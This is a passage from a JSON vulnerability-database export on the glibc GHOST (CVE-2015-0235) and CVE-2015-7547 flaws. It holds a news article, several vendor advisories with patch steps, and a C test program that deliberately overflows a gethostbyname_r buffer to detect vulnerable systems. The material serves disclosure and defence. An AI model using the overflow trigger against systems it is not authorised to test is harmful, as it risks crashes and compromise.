response to a lookup request and floods the program's memory with code.\n\n \n\n\nThis code then compromises the vulnerable application or device and tries to take control of the whole system.\n\n \n\n\nIt is possible to inject the domain name into server log files, which, when resolved, will trigger remote code execution. 
An SSH (Secure Shell) client connecting to a server could also be compromised.\n\n \n\n\nHowever, an attacker needs to bypass several operating system security mechanisms \u2013 _like ASLR and non-executable stack protection_ \u2013 in order to achieve a successful RCE attack.\n\n \n\n\nAlternatively, an attacker on your network could perform **man-in-the-middle** (MitM) attacks and tamper with DNS replies with a view to monitoring and manipulating (injecting payloads of malicious code into) data flowing between a vulnerable device and the Internet.\n\n \n\n\n### Affected Software and Devices\n\n \n\n\nAll versions of glibc after 2.9 are vulnerable. Therefore, any software or application that connects to things on a network or the Internet and uses glibc is at RISK.\n\n \n\n\nThe widely used SSH, sudo, and curl utilities are all known to be affected by the buffer overflow bug, and security researchers warn that the list of other affected applications or code is almost too diverse and numerous to enumerate completely.\n\n \n\n\nThe vulnerability could extend to nearly all major software, including:\n\n * Virtually all distributions of Linux.\n * Programming languages such as Python, PHP, and Ruby on Rails.\n * Many others that use Linux code to look up the numerical IP address of an Internet domain.\n * Most Bitcoin software is [reportedly vulnerable](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>), too.\n\n \n\n\n### Who Is Not Affected\n\n \n\n\nThe good news is users of Google's Android mobile operating system aren't vulnerable to this flaw. 
The company uses a glibc substitute known as Bionic that is not susceptible, according to a Google representative.\n\n \n\n\nAdditionally, a lot of embedded Linux devices, including home routers and various gadgets, are not affected by the bug because these devices use the **uClibc** library, which is more lightweight than the hefty glibc.\n\n \n\n\nThe vulnerability was first introduced in May 2008 but was [reported](<https://sourceware.org/bugzilla/show_bug.cgi?id=18665>) to the glibc maintainers in July 2015.\n\n \n\n\nThe vulnerability was discovered independently by researchers at **Google** and **Red Hat**, who found that the vulnerability has likely not been publicly attacked.\n\n \n\n\nThe flaw was discovered when one of Google's SSH apps experienced a severe error called a segmentation fault each time it attempted to contact a particular Internet address, Google's security team reported in a [blog post](<https://googleonlinesecurity.blogspot.ca/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>) published Monday.\n\n \n\n\n### Where glibc Went Wrong\n\n \n\n\nGoogle researchers figured out that the error was due to a buffer overflow bug inside the glibc library that made malicious code execution attacks possible. The researchers then notified the glibc maintainers.\n\n \n\n\nHere's what went wrong, according to the Google engineers:\n\n \n\n\n> \"glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\" \n \n\"Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. 
The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\"\n\n \n\n\n#### _Proof-of-Concept Exploit Released_\n\nGoogle's Fermin J. Serna released [proof-of-concept](<https://github.com/fjserna/CVE-2015-7547>) (PoC) exploit code on Tuesday.\n\n \n\n\nWith this PoC code, you can check whether you are affected by this critical issue and verify any mitigations you may wish to enact.\n\n \n\n\n### Patch glibc Vulnerability\n\n \n\n\nGoogle researchers, working with security researchers at Red Hat, have [released a patch](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) to fix the programming blunder.\n\n \n\n\nHowever, it is now up to the community behind the Linux OS and to manufacturers to roll out the patch to their affected software and devices as soon as possible.\n\n \n\n\nFor people running servers, fixing the issue will be a simple process of downloading and installing the patch update.\n\n \n\n\nBut for other users, patching the problem may **not be so easy**. 
Apps compiled with a vulnerable glibc version should be recompiled with an updated version \u2013 a process that will take time, as users of affected apps have to wait for developers to make updates available.\n\n \n\n\nMeanwhile, if you aren\u2019t able to patch your instance of glibc immediately, you can help prevent exploitation of the flaw by limiting all TCP DNS replies to 1024 bytes and dropping UDP DNS packets larger than 512 bytes.\n\n \n\n\nFor more in-depth information on the glibc flaw, you can read Red Hat's [blog post](<https://access.redhat.com/errata/RHSA-2016:0175>).\n", "cvss3": {}, "published": "2016-02-16T21:27:00", "type": "thn", "title": "Critical glibc Flaw Puts Linux Machines and Apps at Risk (Patch Immediately)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-0235", "CVE-2015-7547"], "modified": "2016-02-17T08:27:51", "id": "THN:ACBFC80659E47A5B7C81B99570749679", "href": "https://thehackernews.com/2016/02/glibc-linux-flaw.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "vulnerlab": [{"lastseen": "2019-05-29T17:28:54", "description": "", "cvss3": {}, "published": "2015-01-30T00:00:00", "type": "vulnerlab", "title": "Glibc Ghost Vulnerability (CVE-2015-0235) - How to Secure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-30T00:00:00", "id": "VULNERLAB:1430", "href": "http://www.vulnerability-lab.com/get_content.php?id=1430", "sourceData": "Document Title:\r\n===============\r\nGlibc Ghost Vulnerability (CVE-2015-0235) - How to Secure\r\n\r\n\r\nReferences:\r\n===========\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1430\r\n\r\nDownload: http://www.vulnerability-lab.com/resources/documents/1430.pdf\r\n\r\n\r\n\r\nRelease Date:\r\n=============\r\n2015-01-30\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1430\r\n\r\n\r\nDiscovery 
Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nReport\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHigh\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nThe GNU C Library or glibc is an implementation of the standard C library and a core part of the Linux operating system. Without this library a \r\nLinux system will not function. The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control \r\nof the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue.\r\n\r\nThe paper explains the vulnerability in the Linux system and demonstrates how to prevent a local or remote compromise.\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nRajivarnan R. [Security Researcher] - Akati Consulting Pvt Ltd \r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed \r\nor implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable \r\nin any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab \r\nor its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for \r\nconsequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, \r\npolicies, deface websites, hack into databases or trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t \t\t- www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t \t\t- admin@evolution-sec.com\r\nSection: magazine.vulnerability-db.com\t- vulnerability-lab.com/contact.php\t\t \t- evolution-sec.com/contact\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t \t\t- youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php \t\t- vulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php\t- vulnerability-lab.com/register/\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to \r\nelectronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website \r\nis trademark of vulnerability-lab team & the specific authors or managers. 
To record, list (feed), modify, use or edit our material contact \r\n(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2015 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "paloalto": [{"lastseen": "2021-07-28T14:33:13", "description": "The open source library \u201cglibc\u201d has been found to contain a recently discovered vulnerability (CVE-2015-0235, commonly referred to as \u201cGHOST\u201d) that has been demonstrated to enable remote code execution in some software. Palo Alto Networks software makes use of the vulnerable library, however there is no known exploitable condition in PAN-OS software enabled by this vulnerability at the time of this advisory. An update to PAN-OS will be made available that addresses CVE-2015-0235 in a regularly scheduled software maintenance update. (Ref # 74443)\nThe exploitability of CVE-2015-0235 on vulnerable systems is highly dependent on the architecture and design surrounding use of the vulnerable functions within the system, and exploitable conditions found across various open source software libraries have so far been exceedingly rare. 
At the time of this advisory, Palo Alto Networks is not aware of any specific remotely exploitable condition enabled by this vulnerability that affects any Palo Alto Networks products.\nThis issue affects PAN-OS versions prior to PAN-OS 7.0.1\n\n**Workaround:**\nN/A", "cvss3": {}, "published": "2015-02-02T08:00:00", "type": "paloalto", "title": "GHOST: glibc vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2015-02-02T08:00:00", "id": "PAN-SA-2015-0002", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2015-0235", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:32:32", "description": "<p>Recently, security researchers abroad disclosed a serious security issue found in the Linux Glibc library. It can allow an attacker to gain control of the operating system locally or remotely; it has been assigned #CVE-2015-0235# and named the GHOST vulnerability.</p><p>What is GHOST? Why is it named GHOST?</p><p>The vulnerability originates from:</p><p>The first vulnerable version of the GNU C Library is glibc-2.2, released on November 10, 2000.</p><p>\u201cDuring a code audit performed internally at Qualys, we discovered a buffer overflow in</p><p>the __nss_hostname_digits_dots() function of the GNU C Library (glibc).</p><p>This bug is reachable both locally and remotely via the gethostbyname*() functions, so we decided to analyze it<br>and its impact thoroughly, and named this vulnerability \"GHOST\".\u201d</p><p>The gist of the quoted passage: \u201cThe vulnerability is in the GNU C Library (glibc); the affected functions are gethostbyname*(), and it has been named GHOST.\u201d</p><p><strong>What is glibc</strong></p><p>glibc is the libc library released by GNU, that is, the C runtime library. glibc is the lowest-level API in a Linux system, and almost every other runtime library depends on it. Besides wrapping the system services provided by the Linux operating system, glibc itself also provides implementations of many other necessary functional services. glibc covers nearly all of the standards in common use across UNIX.</p><p><strong>Impact:</strong></p><p>Both local and remote use are affected; the flaw can allow an attacker to gain control of the operating system locally or remotely.</p><p><strong>Affected versions:</strong></p><p>Versions from glibc-2.2 to glibc-2.17</p><p>glibc 2.18 (release date: August 12, 2013) already contains the fix (patch release date: May 21, 2013)</p><p><strong>Affected platforms:</strong></p><p><strong> <img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/1.28%E9%85%8D%E5%9B%BE1.jpg\" alt=\"1.28\u914d\u56fe1\" width=\"580\" height=\"612\"></strong></p><p><strong>In response, the Knownsec security research team promptly investigated and published partial remediation steps:</strong></p><p><strong>Ubuntu 12.04 fix:</strong></p><p>Add the official security update sources to /etc/apt/sources.list:</p><p>deb <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security main restricted</p><p>deb-src <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security main restricted</p><p>deb <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security universe</p><p>deb-src <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security universe</p><p>deb <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security multiverse</p><p>deb-src <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security multiverse</p><p>Then run:</p><p>$ sudo apt-get update</p><p>$ sudo apt-get upgrade</p><p><strong>CentOS 6/7:</strong></p><p>Use the official repositories, then run:</p><p># yum clean all && yum update</p><p> </p><p><strong>References:</strong></p><ul><li><a href=\"http://www.openwall.com/lists/oss-security/2015/01/27/9\">http://www.openwall.com/lists/oss-security/2015/01/27/9</a></li><li><a href=\"http://d.hatena.ne.jp/Kango/20150128/1422409960\">http://d.hatena.ne.jp/Kango/20150128/1422409960</a></li></ul>", "cvss3": {}, "published": "2015-07-02T00:00:00", "type": "seebug", "title": "Linux glibc Buffer Overflow\n (Ghost)", "bulletinFamily": "exploit", 
"cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2015-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89237", "id": "SSV:89237", "sourceData": "\n/* GHOST (CVE-2015-0235) test program: calls gethostbyname_r() with a numeric hostname sized so that a vulnerable __nss_hostname_digits_dots() writes past the caller-supplied buffer into the canary that follows it */\n#include <netdb.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <errno.h>\n \n#define CANARY \"in_the_coal_mine\"\n \n/* The canary sits directly after the buffer handed to gethostbyname_r(); an overflow clobbers it */\nstruct {\n char buffer[1024];\n char canary[sizeof(CANARY)];\n} temp = { \"buffer\", CANARY };\n \nint main(void) {\n struct hostent resbuf;\n struct hostent *result;\n int herrno;\n int retval;\n \n /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/\n /* Name length chosen so the buffer-size check in the digits-and-dots path passes on a vulnerable glibc although the writes exceed the buffer */\n size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;\n char name[sizeof(temp.buffer)];\n memset(name, '0', len); /* an all-digit name is parsed by __nss_hostname_digits_dots() */\n name[len] = '\\0';\n \n retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);\n \n if (strcmp(temp.canary, CANARY) != 0) {\n puts(\"vulnerable\");\n exit(EXIT_SUCCESS);\n }\n /* A fixed glibc rejects the undersized buffer with ERANGE instead of overflowing it */\n if (retval == ERANGE) {\n puts(\"not vulnerable\");\n exit(EXIT_SUCCESS);\n }\n puts(\"should not happen\");\n exit(EXIT_FAILURE);\n}\n/* from http://www.openwall.com/lists/oss-security/2015/01/27/9 */\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89237", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/